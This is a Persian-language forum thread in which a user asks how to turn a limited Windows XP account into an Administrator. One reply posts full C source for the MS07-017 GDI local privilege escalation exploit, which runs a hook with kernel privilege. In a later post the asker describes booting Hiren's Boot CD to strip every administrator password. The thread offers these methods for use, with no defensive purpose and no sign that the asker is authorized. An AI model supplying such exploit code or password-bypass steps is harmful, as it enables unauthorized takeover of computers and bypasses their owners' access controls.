نمایش نتایج: از شماره 1 تا 7 از مجموع 7
سپاس ها 1سپاس

موضوع: چطوري كاربر Limited رو به Administrator تبديل كنم ؟

  
  1. #1
    نام حقيقي: مصطفي مختاري

    خواننده شناسه تصویری mokhtari12
    تاریخ عضویت
    Jul 2007
    محل سکونت
    ايران
    نوشته
    6
    سپاسگزاری شده
    1
    سپاسگزاری کرده
    2

    چطوري كاربر Limited رو به Administrator تبديل كنم ؟

    با سلام خدمت اعضا:
    چطوري ميتونم وقتي كه با استفاده از يه يوزر Limited به ويندوز
    اكس پي Log on كرده ام اون يوزر رو به Administrator تبديل كنم ؟

    آيا كد خاصي رو ميشه در Command Prompt زد و اين كار عملي بشه ؟

    خيلي حياتيه لطفاً كمك كنيد
    يا اگه ميتونيد آدرس بديد



    موضوعات مشابه:

  2. #2
    نام حقيقي: Alireza HBB

    عضو غیر فعال شناسه تصویری Alux
    تاریخ عضویت
    Jan 2006
    محل سکونت
    Tehran
    نوشته
    1,492
    سپاسگزاری شده
    286
    سپاسگزاری کرده
    399
    می تونی از باگ های local واسه بالا بردن privilege استفاده کنی

    اطلاعات بیشتر : سایت های هک



  3. #3
    نام حقيقي: مصطفي مختاري

    خواننده شناسه تصویری mokhtari12
    تاریخ عضویت
    Jul 2007
    محل سکونت
    ايران
    نوشته
    6
    سپاسگزاری شده
    1
    سپاسگزاری کرده
    2
    سعي ميكنم در مورد گفته شما جستجو كنم.
    متشكرم



  4. #4
    نام حقيقي: مصطفي مختاري

    خواننده شناسه تصویری mokhtari12
    تاریخ عضویت
    Jul 2007
    محل سکونت
    ايران
    نوشته
    6
    سپاسگزاری شده
    1
    سپاسگزاری کرده
    2
    از دوستان اگه كس ديگه اي ميتونه كمكم كنه.



  5. #5
    نام حقيقي: Alireza HBB

    عضو غیر فعال شناسه تصویری Alux
    تاریخ عضویت
    Jan 2006
    محل سکونت
    Tehran
    نوشته
    1,492
    سپاسگزاری شده
    286
    سپاسگزاری کرده
    399
    این یه نمونه

    روش ها خیلی زیاده و یکم اگه تو هک سرر شته داشته باشین کارتون راه می افته

    من فرض کردم os شما ویندوز هست

    اینم یه Exploit
    کد:
    /* GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017) Coded by Lionel d'Hauenens http://www.labo-asso.com Development: ------------ Dev-C++ 4.9.9.2 Linked with /lib/libgdi32.a References: ----------- http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx http://research.eeye.com/html/alerts/zeroday/20061106.html http://www.milw0rm.com/exploits/3688 http://ivanlef0u.free.fr/?p=41 March 16, 2007 */ #include <stdio.h> #include <stdlib.h> #include <windows.h> typedef enum _SECTION_INFORMATION_CLASS { SectionBasicInformation, SectionImageInformation } SECTION_INFORMATION_CLASS; typedef struct _SECTION_BASIC_INFORMATION { ULONG Base; ULONG Attributes; LARGE_INTEGER Size; } SECTION_BASIC_INFORMATION; typedef struct _GDI_TABLE_ENTRY { PVOID pKernelInfo; WORD ProcessID; WORD _nCount; WORD nUpper; BYTE nType; BYTE flags; PVOID pUserInfo; } GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY; typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG); NTQUERYSECTION NtQuerySection; #define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix"); #define STATUS_SUCCESS 0 #define PAL_TYPE 8 DWORD flag_test; hook (HANDLE pal, COLORREF couleur) { // INT3 // Executed code with kernel privilege asm (".intel_syntax noprefix"); __asm ("cli"); // it's the fiesta !!! :) __asm ("sti"); asm (".att_syntax noprefix"); flag_test = 1; return (TRUE); } int main(int argc, char *argv[]) { SECTION_BASIC_INFORMATION SectionInfo; PGDI_TABLE_ENTRY pGdiEntry; PLOGPALETTE pLogPal; HANDLE hPal; PVOID OriginalPalObject; PVOID FalsePalObject; HANDLE hThread = GetCurrentThread(); DWORD OriginalThreadPriotity = GetThreadPriority (hThread); HANDLE hSection = (ULONG)0; PVOID MapFile = 0; HANDLE hProcess = (HANDLE)0xFFFFFFFF; WORD Pid = GetCurrentProcessId(); NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection"); printf ("##########################################################\n"); printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n"); printf ("# All Windows 2000/XP before MS07-017 patch #\n"); printf ("##########################################################\n"); printf ("# coded by Lionel d'Hauenens http://www.labo-asso.com #\n"); printf ("##########################################################\n\n"); // Search handle section and mapper in virtual memory of user while ((DWORD)hSection<0xFFFF) { SectionInfo.Attributes = 0; MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); if (MapFile) { NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0); if (SectionInfo.Attributes == SEC_COMMIT) break; // For compatibility with win2k UnmapViewOfFile(MapFile); MapFile = 0; } hSection++; } if (!MapFile) { printf ("Could not found shared section !\n"); exit(0); } // Create Palette pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1); pLogPal->palNumEntries = 1; pLogPal->palVersion = 0x300; hPal = (HANDLE)CreatePalette(pLogPal); if (!hPal) { printf ("Could not create palette !\n"); exit(0); } // Search the entry of pal object OriginalPalObject = (PVOID)0; pGdiEntry = (PGDI_TABLE_ENTRY)MapFile; while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart) { if ( pGdiEntry->ProcessID == Pid && pGdiEntry->nType == PAL_TYPE ) { // Save original pointer OriginalPalObject = (PVOID)pGdiEntry->pKernelInfo; break; } pGdiEntry++; } if (!OriginalPalObject) { printf ("Could not find entry of Pal object !\n"); exit(0); } // Create the false Pal object FalsePalObject = (PVOID) calloc(0x100/4,4); ((PDWORD)FalsePalObject)[0] = (DWORD)hPal; // Handle ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1; // Availabled flag ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex printf ("Section:\n--------\n"); printf ("Handle: 0x%08X Attributes: %08X Size: 0x%08X\n\n", hSection , SectionInfo.Attributes , SectionInfo.Size.QuadPart); printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); printf ("Address of user map: 0x%08X\n", MapFile); printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject); printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) ); printf ("Address of Hook(): 0x%08X\n\n", &hook); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// printf ("->Test..."); flag_test = 0; SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); // Active false Pal object pGdiEntry->pKernelInfo = FalsePalObject; GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :); // Restore original Pal object pGdiEntry->pKernelInfo = OriginalPalObject; SetThreadPriority (hThread,OriginalThreadPriotity); ////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////// if (!flag_test) printf ("ERROR !!!\n"); else printf ("OK :)\n"); UnmapViewOfFile(MapFile); DeleteObject ((HANDLE)hPal); free((PVOID)pLogPal); free((PVOID)FalsePalObject);
    system("PAUSE"); return (0);
    }



    mokhtari12 سپاسگزاری کرده است.

  6. #6
    نام حقيقي: مصطفي مختاري

    خواننده شناسه تصویری mokhtari12
    تاریخ عضویت
    Jul 2007
    محل سکونت
    ايران
    نوشته
    6
    سپاسگزاری شده
    1
    سپاسگزاری کرده
    2
    لينك هاي منابع داخل كد عليرضا رو پيگيري كردم:

    اين دوتا زبانشون انگليسي نبود:
    http://www.labo-asso.com/php/intro.php
    http://ivanlef0u.free.fr/?p=41

    نمونه كد:
    http://ivanlef0u.free.fr/?p=41
    http://www.milw0rm.com/exploits/3688

    سايت مايكروسافت هم در باره چگونگي حل و Patch اي كه ارائه داده بود صحبت كرده بود
    http://www.microsoft.com/technet/sec.../MS07-017.mspx

    اين يكي توضيحات خيلي جالبي در مورد كاري كه فرد بدافزار نويس ميتونه بكنه داشت
    http://research.eeye.com/html/alerts.../20061106.html

    كد خودتون در پاسخ بالا و نمونه كد ها رو با BC5.02 امتحانش ولي ايراد ميگيره
    و نتونستم ايراد ها رو رفع كنم.
    نسخه Dev-C++ 4.9.9.2 كه براي اجرا مي خواهد رو هم ندارم.

    حتي اگه اون كدها هم اجرا مي شد باز هم شرايطي در اون ها بود مثل:
    کد:
     
    if(Status)
    printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
    else
    printf("Addr : 0x%x OKAY\n", Addr);
    كه در صورت درست بودن If و پرينت بايد مشكل توسط مجري رفع بشه !


    در كل به اين نتيجه رسيدم كه به مطالعه بيشتري براي اين كار نياز دارم.
    از همراهي شما آقا عليرضا (Alux) در اين تاپيك متشكرم



  7. #7
    نام حقيقي: مصطفي مختاري

    خواننده شناسه تصویری mokhtari12
    تاریخ عضویت
    Jul 2007
    محل سکونت
    ايران
    نوشته
    6
    سپاسگزاری شده
    1
    سپاسگزاری کرده
    2
    يه راه حل ديگه هم پيدا شد:
    با يك سي دي بوت Hiren's Boot cd
    http://www.9down.com/Hiren-s-BootCD-...rd-Patch-9670/
    ميشه از طريق سي دي
    كامپيوتر رو بوت كرد و با برنامه اكتيو پسورد چنجر اون تمام پسورد هاي ادمينها رو حذف كرد

    حالا توسط يكي از ادمين ها اين كاربر محدود رو به ادمين تبديل مي كنيم !



کلمات کلیدی در جستجوها:

تبدیل یوزر لیمیت به ادمین

تبدیل یوزر به ادمین

تبدیل user به Administrator

تبدیل یوزر به ادمین در ویندوز 7تبديل user به adminتبدیل user به adminتبدیل یوزر معمولی به ادمینتبدیل یوزر به ادمین در شبکهچطوری میشه یوزر استاندارد و به یوزر ادمین تبدیل کردتبدیل یوزر به administratorتبدیل یوزر محدود به ادمینتبدیل یوزر لیمیت به ادمین در ویندوز 7تبدیل یوزر standard user به administratorتبدیل یوزر محدود بهتبديل يوزر ليميت به ادمينتبدیل ویندوز بهadmin&amp;#1578;&amp;#1576;&amp;#1583;&amp;#1610;&amp;#1604; &amp;#1610;&amp;#1608;&amp;#1586;&amp;#1585; &amp;#1576;&amp;#1607; ADMIN LOCALتبدیل user به administrator در xpچگونگی تبدیل ویندوز user به adminچگونه کاربر limite شده را admin کنیمتبدیل به ادمینتبدیل کاربر به Adminتبدیل یوز به windows 7 adminstratorتبديل limited user به adminیوزر LIMITED

برچسب برای این موضوع

مجوز های ارسال و ویرایش

  • شما نمی توانید موضوع جدید ارسال کنید
  • شما نمی توانید به پست ها پاسخ دهید
  • شما نمی توانید فایل پیوست ضمیمه کنید
  • شما نمی توانید پست های خود را ویرایش کنید
  •